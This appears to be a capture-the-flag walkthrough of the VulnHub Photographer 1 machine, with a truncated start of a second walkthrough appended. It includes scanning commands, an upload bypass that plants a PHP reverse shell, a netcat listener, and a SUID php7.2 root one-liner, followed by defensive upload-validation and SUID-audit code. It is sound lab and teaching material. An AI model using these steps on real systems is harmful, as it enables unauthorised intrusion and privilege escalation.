
VULNHUB PHOTOGRAPHER - 1 WALK-THROUGH

Welcome to the walkthrough of Photographer 1 from VulnHub, a boot-to-root machine that focuses on a Koken CMS unrestricted file upload vulnerability leading to RCE. The vulnerable machine can be downloaded from here.

Hints for the machine:

  1. Netdiscover, Nmap
  2. Port 8000 Koken CMS
  3. Smbclient
  4. Php file upload
  5. Shell
  6. Finding SUID - php7.2
  7. Privilege Escalation

Walkthrough:

# Finding IP address

Once the machine is deployed, the first task is to obtain its IP address. We will use a tool named netdiscover to discover all the IPs in our internal network.

Command is

sudo netdiscover -i eth0

Since no other virtual machine is up, this seems like the IP address of the victim.

# Nmap scan

As usual, we start with a basic nmap scan.

Command is

sudo nmap -sC -sV -T4 <IP>

Command details

  • sudo – to run with root privileges
  • -sC – running default scripts
  • -sV – Version/Services info
  • -T4 – faster execution

Looking at the results, we have a higher port, 8000, open and running Koken, ports 139 and 445 running Samba, and port 80 serving the default Apache web page.

# Port 8000 enumeration

We know it’s running Koken CMS version 0.22.24, so let’s quickly search for an exploit for that version using searchsploit.

Command

searchsploit Koken 0.22.24

We have one exploit. To copy the exploit, either download it from the browser or mirror it to your current directory using the command

searchsploit -m php/webapps/48706.txt

Before moving forward and using any exploit, I like to do basic enumeration of the exploit itself. Since this exploit requires authentication, we need credentials to log in, and we also don’t know yet how to reach the login page. Understanding the exploit code comes in handy: it points us to a directory named /admin, which is a login form.

I tried some default creds, but they did not work.

# Port 139 and 445 – Smbclient

Smbclient is similar to an FTP client and is used to access resources on an SMB server.

To list the shares, we use the command

smbclient -L //<IP>

To access a share, we use the command (-N connects to the share without a password).

smbclient -N //<IP>/sambashare

There are two files. Let’s download them to our machine using the get command.

I tried to analyze the backup zip but it was a rabbit hole.

Read the content of mailsent.txt using the cat command.

This file gives us lots of information, such as email addresses and a possible username. The last line gives us a secret, “babygirl”; maybe it’s a password.

I tried logging in with [email protected]:babygirl and got logged in successfully.

Now we follow the exploit process.

Fire up Burp Suite; we will intercept the upload request. First, click the “Import content” button in the bottom right corner.

I used the PHP reverse shell from PayloadsAllTheThings, changed the extension to .jpg for the upload, and turned on Burp to intercept this request.

After intercepting the request in Burp, change the extension back to .php and forward the request.

The shell has been uploaded. To access it, hover over the “Download File” button in the top right corner and open it in a new tab.

But before that we need a listener to catch our reverse shell. You can use tools like pwncat, msf-handler or netcat to catch the reverse shell.

Use command nc -nvlp 1234 to start a netcat listener.

Opening the php reverse shell file, we get a connection back. We are a low privileged user as of now.

Before any further enumeration, let’s stabilize our shell.

Command is

python3 -c 'import pty; pty.spawn("/bin/bash")'
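The upload step above works because the CMS trusts the client-supplied extension, so renaming the payload in Burp is enough. As an added example (not Koken's code and not from the original post), here is the server-side check that closes that gap: the extension must be on an allowlist, must not carry an executable extension anywhere in the name, the file's magic bytes must match the declared type, and the stored name is chosen by the server. The allowlist and extension sets are constructed for this example.

```python
import os
import re
from typing import Optional, Tuple

# Constructed allowlist for this example: extension -> accepted magic-byte prefixes.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Server-side executable extensions that must not appear anywhere in the name
# (catches shell.php as well as double extensions such as shell.php.jpg).
EXEC_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl", "py", "sh"}

PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def validate_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). The client-supplied name only selects the
    allowlist entry; the bytes must independently prove the declared type."""
    name = os.path.basename(filename.replace("\\", "/"))  # drop path components
    parts = name.lower().split(".")
    if len(parts) < 2 or not all(parts):
        return False, "missing or empty extension"
    if any(p in EXEC_EXTENSIONS for p in parts[1:]):
        return False, "executable extension in name"
    ext = parts[-1]
    if ext not in ALLOWED_TYPES:
        return False, "extension .%s not allowed" % ext
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match declared type"
    # A genuine image with a PHP tag inside can still be executed by a
    # misconfigured server, so reject it too.
    if PHP_TAG.search(content):
        return False, "embedded PHP tag"
    return True, "ok"


def stored_name(filename: str, content: bytes) -> Optional[str]:
    """Server-chosen random name with the validated extension; the client's
    filename is never used on disk."""
    accepted, _ = validate_upload(filename, content)
    if not accepted:
        return None
    ext = os.path.basename(filename).lower().rsplit(".", 1)[-1]
    return "%s.%s" % (os.urandom(8).hex(), ext)
```

Against the request from the walkthrough, the renamed .php is rejected by name and the .jpg-named PHP file is rejected because its bytes are not a JPEG.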

# Privilege Escalation using SUID binaries

To find SUID binaries we use a one-liner:

find / -perm -4000 2>/dev/null

There is a SUID binary that can be used for privilege escalation: php7.2.

Use the command 

/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"

And now we are root.
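A setuid interpreter like php7.2 is exactly what a host audit should catch before an attacker does. As an added example (not from the original post), this script does the same walk as the find one-liner above, flags setuid files whose basename is an interpreter or shell-spawning tool, and diffs the result against a known-good baseline. The list of risky basenames and the skipped directories are constructed for this example.

```python
import os
import stat
from typing import Dict, Iterable, List

# Constructed list: interpreters and tools that hand out a shell when setuid.
# The page's case is php7.2; versioned names (python3.8, perl5.30) are matched too.
RISKY_BASENAMES = ("php", "python", "perl", "ruby", "bash", "sh", "dash", "zsh",
                   "node", "lua", "vim", "vi", "find", "env", "nmap", "gdb")

SKIP_DIRS = ("/proc", "/sys", "/dev", "/run")  # virtual filesystems, not worth walking


def is_setuid(mode: int) -> bool:
    """Same test as find -perm -4000 -type f: a regular file with the setuid bit."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def is_risky_name(path: str) -> bool:
    """True if the basename is a risky interpreter, optionally versioned (php7.2)."""
    base = os.path.basename(path).lower()
    for name in RISKY_BASENAMES:
        if base == name:
            return True
        if base.startswith(name) and base[len(name)] in "0123456789.-":
            return True
    return False


def audit_suid(root: str, baseline: Iterable[str] = ()) -> Dict[str, List[str]]:
    """Walk root and report every setuid file, the risky ones, and any not in
    the known-good baseline (e.g. the list taken from a freshly installed host)."""
    known = set(baseline)
    report: Dict[str, List[str]] = {"setuid": [], "risky": [], "unexpected": []}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for fname in filenames:
            path = os.path.join(dirpath, fname)
            try:
                mode = os.lstat(path).st_mode  # lstat: do not follow symlinks
            except OSError:
                continue
            if not is_setuid(mode):
                continue
            report["setuid"].append(path)
            if is_risky_name(path):
                report["risky"].append(path)
            if path not in known:
                report["unexpected"].append(path)
    return report
```

Run audit_suid("/", baseline) from a scheduled job and alert on anything in "risky" or "unexpected"; on this box /usr/bin/php7.2 would show up in both.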

A pretty easy machine; the main focus was the Koken CMS upload functionality.


Thanks for reading !


Welcome to the walkthrough of InfoSec Prep: OSCP walkthrough. It is a beginner-level boot2root machine and it can be downloaded from  here . I cracked this machine literally 5 minutes after it booted properly. So you can consider this machine the easiest.  Hint: Nmap Finding secret.txt and decoding it. Login via ssh. Privilege escalation to root via SUID binary.  Boot up the machine and it should show the IP address. We start off by pinging the box to verify that the box is up and running and we can reach out to it. Command: ping <IP> Then we can run Nmap scan to look for open ports and services running on the box. We will use -sC for running default scripts, -sV for Version/Service info and -T4 for faster execution, and -o for saving the result on a file named nmap The command is: sudo nmap -sC -sV -T4 <IP> -o filename Looking at the scan results, port 22 is open and running ssh, and port 80 is open, and it's running Apache. We can also see a directory named secret.txt